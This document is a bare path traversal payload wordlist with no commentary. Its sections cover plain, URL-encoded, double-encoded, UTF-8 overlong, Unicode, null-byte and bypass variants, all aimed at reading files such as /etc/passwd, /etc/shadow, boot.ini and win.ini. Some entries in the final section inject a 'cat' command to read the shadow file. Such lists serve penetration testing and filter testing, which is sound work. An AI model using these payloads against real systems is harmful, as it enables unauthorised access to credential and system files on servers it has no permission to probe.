# Basic Patterns (No Encoding)
../etc/passwd
../etc/issue
../boot.ini
../windows/system32/drivers/etc/hosts
../../etc/passwd
../../etc/issue
../../boot.ini
../../windows/system32/drivers/etc/hosts
../../../etc/passwd
../../../etc/issue
../../../boot.ini
../../../windows/system32/drivers/etc/hosts
../../../../etc/passwd
../../../../etc/issue
../../../../boot.ini
../../../../windows/system32/drivers/etc/hosts
../../../../../etc/passwd
../../../../../etc/issue
../../../../../boot.ini
../../../../../windows/system32/drivers/etc/hosts
../../../../../../etc/passwd
../../../../../../etc/issue
../../../../../../boot.ini
../../../../../../windows/system32/drivers/etc/hosts
..\etc\passwd
..\etc\issue
..\boot.ini
..\windows\system32\drivers\etc\hosts
..\..\etc\passwd
..\..\etc\issue
..\..\boot.ini
..\..\windows\system32\drivers\etc\hosts
..\..\..\etc\passwd
..\..\..\etc\issue
..\..\..\boot.ini
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\etc\passwd
..\..\..\..\etc\issue
..\..\..\..\boot.ini
..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\etc\passwd
..\..\..\..\..\etc\issue
..\..\..\..\..\boot.ini
..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\etc\issue
..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\windows\system32\drivers\etc\hosts

# URL Encoded
..%2fetc%2fpasswd
..%2fetc%2fissue
..%2fboot.ini
..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts
..%2f..%2fetc%2fpasswd
..%2f..%2fetc%2fissue
..%2f..%2fboot.ini
..%2f..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fissue
..%2f..%2f..%2fboot.ini
..%2f..%2f..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fissue
..%2f..%2f..%2f..%2fboot.ini
..%2f..%2f..%2f..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fissue
..%2f..%2f..%2f..%2f..%2fboot.ini
..%2f..%2f..%2f..%2f..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fissue
..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts
..%5cetc%5cpasswd
..%5cetc%5cissue
..%5cboot.ini
..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
..%5c..%5cetc%5cpasswd
..%5c..%5cetc%5cissue
..%5c..%5cboot.ini
..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5cetc%5cissue
..%5c..%5c..%5cboot.ini
..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5cetc%5cissue
..%5c..%5c..%5c..%5cboot.ini
..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5cetc%5cissue
..%5c..%5c..%5c..%5c..%5cboot.ini
..%5c..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5c..%5cetc%5cissue
..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
..%5c..%5c..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
%2e%2e%2fetc%2fpasswd
%2e%2e%2fetc%2fissue
%2e%2e%2fboot.ini
%2e%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fissue
%2e%2e%2f%2e%2e%2fboot.ini
%2e%2e%2f%2e%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fissue
%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts
%2e%2e%5cetc%5cpasswd
%2e%2e%5cetc%5cissue
%2e%2e%5cboot.ini
%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
%2e%2e%5c%2e%2e%5cetc%5cpasswd
%2e%2e%5c%2e%2e%5cetc%5cissue
%2e%2e%5c%2e%2e%5cboot.ini
%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cissue
%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts

# Double URL Encoded
..%252fetc%252fpasswd
..%252fetc%252fissue
..%252fboot.ini
..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts
..%252f..%252fetc%252fpasswd
..%252f..%252fetc%252fissue
..%252f..%252fboot.ini
..%252f..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts
..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252fetc%252fissue
..%252f..%252f..%252fboot.ini
..%252f..%252f..%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts
..%255cetc%255cpasswd
..%255cetc%255cissue
..%255cboot.ini
..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts
..%255c..%255cetc%255cpasswd
..%255c..%255cetc%255cissue
..%255c..%255cboot.ini
..%255c..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts
..%255c..%255c..%255cetc%255cpasswd
..%255c..%255c..%255cetc%255cissue
..%255c..%255c..%255cboot.ini
..%255c..%255c..%255cwindows%255csystem32%255cdrivers%255cetc%255chosts
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fissue
%252e%252e%252fboot.ini
%252e%252e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fissue
%252e%252e%252f%252e%252e%252fboot.ini
%252e%252e%252f%252e%252e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts
%252e%252e%255cetc%255cpasswd
%252e%252e%255cetc%255cissue
%252e%252e%255cboot.ini
%252e%252e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts
%252e%252e%255c%252e%252e%255cetc%255cpasswd
%252e%252e%255c%252e%252e%255cetc%255cissue
%252e%252e%255c%252e%252e%255cboot.ini
%252e%252e%255c%252e%252e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts

# UTF-8 Overlong Encoding
..%c0%afetc%c0%afpasswd
..%c0%afetc%c0%afissue
..%c0%afboot.ini
..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts
..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%afetc%c0%afissue
..%c0%af..%c0%afboot.ini
..%c0%af..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afissue
..%c0%af..%c0%af..%c0%afboot.ini
..%c0%af..%c0%af..%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts
..%c0%5cetc%c0%5cpasswd
..%c0%5cetc%c0%5cissue
..%c0%5cboot.ini
..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts
..%c0%5c..%c0%5cetc%c0%5cpasswd
..%c0%5c..%c0%5cetc%c0%5cissue
..%c0%5c..%c0%5cboot.ini
..%c0%5c..%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts
..%c1%9cetc%c1%9cpasswd
..%c1%9cetc%c1%9cissue
..%c1%9cboot.ini
..%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts
..%c1%9c..%c1%9cetc%c1%9cpasswd
..%c1%9c..%c1%9cetc%c1%9cissue
..%c1%9c..%c1%9cboot.ini
..%c1%9c..%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts
%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%afetc%c0%afissue
%c0%ae%c0%ae%c0%afboot.ini
%c0%ae%c0%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts
%c0%ae%c0%ae%c1%9cetc%c1%9cpasswd
%c0%ae%c0%ae%c1%9cetc%c1%9cissue
%c0%ae%c0%ae%c1%9cboot.ini
%c0%ae%c0%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts

# Unicode Variations
..%u2215etc%u2215passwd
..%u2215etc%u2215issue
..%u2215boot.ini
..%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts
%uff0e%uff0e%u2215etc%u2215passwd
%uff0e%uff0e%u2215etc%u2215issue
%uff0e%uff0e%u2215boot.ini
%uff0e%uff0e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts
..%u2216etc%u2216passwd
..%u2216etc%u2216issue
..%u2216boot.ini
..%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts
%uff0e%uff0e%u2216etc%u2216passwd
%uff0e%uff0e%u2216etc%u2216issue
%uff0e%uff0e%u2216boot.ini
%uff0e%uff0e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts
..%uEFC8etc%uEFC8passwd
..%uEFC8etc%uEFC8issue
..%uEFC8boot.ini
..%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts
..%uF025etc%uF025passwd
..%uF025etc%uF025issue
..%uF025boot.ini
..%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts

# Null Byte Termination
../../etc/passwd%00
../../etc/issue%00
../../boot.ini%00
../../windows/system32/drivers/etc/hosts%00
..%2f..%2fetc%2fpasswd%00
..%2f..%2fetc%2fissue%00
..%2f..%2fboot.ini%00
..%2f..%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts%00
/etc/passwd%00
/etc/shadow%00
/etc/passwd%00.jpg
/etc/passwd%00.html
..%c0%af..%c0%afetc%c0%afpasswd%00
%00/etc/passwd%00
%00../../../../etc/passwd

# Windows-Specific Targets
..%5cWINDOWS%5cwin.ini
..%5c..%5cWINDOWS%5cwin.ini
..%5c..%5c..%5cWINDOWS%5cwin.ini
..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini
%2e%2e%5cWINDOWS%5cwin.ini
%2e%2e%5c%2e%2e%5cWINDOWS%5cwin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5cWINDOWS%5cwin.ini
C:%5cinetpub%5cwwwroot%5cglobal.asa
C:%2fWindows%2fwin.ini
C:%2fboot.ini
C:%5cboot.ini
..%5c..%5c..%5c..%5cboot.ini
..%5c..%5c..%5c..%5c..%5cboot.ini
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%00

# Special Bypass Techniques
/..\../..\../etc/passwd
/..\../..\../etc/shadow
.\\./.\\./etc/passwd
.\\./.\\./etc/shadow
/../../../../../../%2A
/..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../etc/shadow
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66etc%32%66passwd
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66etc%32%66shadow
..;%2fetc%2fpasswd
..;%2fetc%2fissue
..;%2fboot.ini
..;%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts
AAAAAAAA.../../etc/passwd
AAAAAAAA.../../etc/shadow
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
/.../.../.../.../.../
